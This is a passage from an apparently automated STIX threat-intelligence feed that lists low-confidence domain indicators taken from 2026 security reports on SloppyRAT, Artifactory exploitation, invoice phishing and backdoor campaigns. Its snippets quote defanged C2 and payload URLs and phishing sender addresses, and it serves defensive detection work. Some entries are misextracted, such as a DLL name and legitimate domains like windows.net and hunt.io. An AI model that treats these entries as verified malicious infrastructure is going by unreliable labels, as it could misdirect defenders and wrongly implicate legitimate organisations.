News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d6bd138-84c2-4fde-8c71-edc76e43837a","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hostfxr.dll","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: L URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3f0d08c8-6eeb-4780-9409-5c5aedcd7401","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: fffa67744812d73ad98eb config.py Python script Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d90fcce-1bc5-4a65-a6b1-8b4291efa61f","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain finger.linked4x[.]com ClickFix script domain Domain skipraid[.]com CastleLoader domain URL hxxps[://]skipraid[.]com/dsVGmQTr","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e5b1e70-b6a8-489d-bf8a-055f0aec93b7","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: id[.]com/dsVGmQTrzX/default2 CastleLoader URL URL hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/config.py Python loader URL URL hxxps[://]stro","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5dbfd70d-921c-40a9-9496-19882dc6de0f","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: telephoneip.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ible; DLLMemLoader/1.0) Python loader User-Agent Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT","pattern":"[domain-name:value = 'telephoneip.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cb1c13b8-98ac-4921-a1a9-a762111b03a2","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: truesmart.org","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: Domain api.telephoneip[.]net SloppyRAT C2 domain Domain api.truesmart[.]org SloppyRAT C2 domain Note: IP addresses and domains are in","pattern":"[domain-name:value = 'truesmart.org']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9ef21de5-0b6c-46d0-8e1b-e787089a9155","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: windows.net","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: m/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blob.core.windows[.]net Python downloader C2 IP address 62.106.66[.]148:443 Slopp","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-deploy-new-sloppyrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca62cf87-6e54-473d-b7c5-0ec27a1ca1db","created":"2026-09-11T08:17:33.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gitclone.org","description":"Seen in \"JFrog Artifactory Vulnerabilities Actively Exploited in the Wild to Gain Administrative Control\" (Cyber Security News). Context: .184.111[.]69 , 64.207.232[.]6:8443 Payload URLs hxxp://log.gitclone[.]org:45678/smtp , hxxp://3.88.162[.]79:36789/smtp File / Hash","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T08:17:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/jfrog-artifactory-vulnerabilities-actively-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c3ae4e0-e88a-4017-b5a2-2b4ab9ce2ad3","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: domainlify.net","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: t in the fake invoice as a contact address. Another domain, domainlify[.]net, was used in Reply-To fields. The short preparation perio","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c85f620e-2ba3-4499-98fb-75fdd7c5b040","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6c7b24e-d312-46ce-9c9f-b5d09ea49452","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lifeones.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--912632d6-f4a5-4d44-be42-305325391bf3","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--327c2d61-ea98-4762-bcf0-851b59bdc928","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86096700-0a28-45b3-b4cf-d34b6afd17a6","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mctci.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cde1a851-c61a-4168-bea2-5cb5adf699f6","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2b390dd7-1eed-4b0e-800c-831b86629ecf","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: onsumer goods’ and others (Source : Microsoft). One domain, service-nowinc[.]com, was registered on July 31, shortly before the phishing a","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c225db9-7981-4cff-9924-6688342fa630","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8e0881b-ace2-45c7-8d74-bba99e5e603f","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ac75d8b2-8e7a-4c18-9f22-72274a6f380c","created":"2026-09-11T07:43:48.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Use AI-Assisted CEO Emails to Trick Finance Teams Into Sending $50,000 Payments.\" (GBHackers). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T07:43:48.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/ai-assisted-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16ea7dc2-c0af-4fe8-b3a7-d86e4f8da16c","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: noht1ng.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: il.uaiubifas[.]top backdoor command server, port 443 Domain noht1ng[.]top hosted the exploit page IP 8.218.50[.]207 staging server,","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1c0ef78-8af6-42eb-9e31-908987e09cdd","created":"2026-09-11T07:14:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked UNC3569 Exploited Sogou Input Method Flaw to Deploy GRAYRABBIT Backdoor\" (The Hacker News). Context: hind is GRAYRABBIT. The backdoor reaches its server at mail.uaiubifas[.]top on port 443, and the traffic there is plain TCP scrambled","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-11T07:14:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/china-linked-unc3569-exploited-sogou.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0731eff-93cd-49dc-8afd-41ef55d0b3ea","created":"2026-09-11T07:14:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: apimantax.otax.fun","description":"Seen in \"Mantax OTAX Android Ransomware Spies on Users, Steals OTPs and Encrypts Files\" (GBHackers). Context: Mantax OTAX Android Ransomware Zimperium identified hxxps://apimantax[.]otax[.]fun as a C2-related domain in its analysis and published as","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T07:14:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/mantax-otax-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99391e91-5e4d-4e0d-9e56-58e7771b490f","created":"2026-09-11T07:11:14.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hunt.io","description":"Seen in \"UK Council Attack Linked to Mass Exploitation of SonicWall Flaw\" (Security Affairs). Context: e automated campaigns was effectively less than three days. Hunt.io’s AttackCapture system crawled the attacker’s open director","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-11T07:11:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/198864/hacking/uk-council-attack-linked-to-mass-exploitation-of-sonicwall-flaw.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85246fdf-f1dc-4edd-8073-b76438dc3258","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: linked4x.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: irectories. Security teams should also hunt for the domains linked4x[.]com , skipraid[.]com , and the observed Azure Blob Storage pa","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--754dea4b-5031-4cd6-a41a-c54003225b92","created":"2026-09-11T06:17:07.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: skipraid.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (GBHackers). Context: the download of CastleLoader and CastleRAT components from skipraid[.]com , using the distinctive K8VGmQTrzX User-Agent string. Cas","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-11T06:17:07.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-new-sloppyrat-via-clickfix-to-enable-ransomware-lateral-movement/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9acb3f5-1057-416b-a260-3e2751854da2","created":"2026-09-10T19:04:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gitclone.org","description":"Seen in \"Artifactory Under Attack: In-the-Wild Exploitation of CVE-2026-42016, CVE-2026-42018 & CVE-2026-82329\" (Wiz Blog). Context: -2026-42018/CVE-2026-42016 2026-08-28 2026-09-07 hxxp://log.gitclone[.]org:45678/smtp Payload download after CVE-2026-42018/CVE-2026","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-10T19:04:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Wiz Blog","url":"https://www.wiz.io/blog/artifactory-under-attack-in-the-wild-exploitation-of-cve-2026-42016-cve-2026-4201"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97530ae9-23c8-4c52-b5e8-4e736f9bf8e4","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: domainlify.net","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: also registered another domain on the same day. The domain domainlify[.]net was used in the Reply-To email. Figure 7. Account informa","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a02e79c9-414f-4d77-80fd-9cbac49447e6","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: eemusicclass.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: uerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cb8f1fe0-e982-475d-bb16-279b9293fbc3","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lifeones.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email address Sender email address used to send out email","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a70dabfc-63b5-4f55-8acc-9189672622bc","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: umalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt contact@eemusicclass[.]co[.]uk inf","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--227d5898-4b1d-46da-bef0-5a13520e0022","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lumalisboa.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhil","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48913c39-ba34-432a-889a-89e72f4cc52b","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mctci.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: k info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25adb43a-575d-41cb-90d9-683977c684d5","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nuf.co.jp","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: th[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbati","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fe6977c-1227-453e-a178-66edf8ac73af","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: service-nowinc.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: registered several domains. A ‘ServiceNow’ lookalike domain service-nowinc[.]com was registered on July 31, shortly before the campaign ac","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ce390044-c49b-402b-b147-2dcdfe8f28e5","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tivityhealth.com","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com noreply@mctci[.]com info@nuf[.]","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7f3b533-088e-4bfd-945f-79ff28b3cf45","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tovimbatista.pt","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: nuf[.]co[.]jp info@lohnsteuerhilfe-aktuell-verein[.]de info@tovimbatista[.]pt 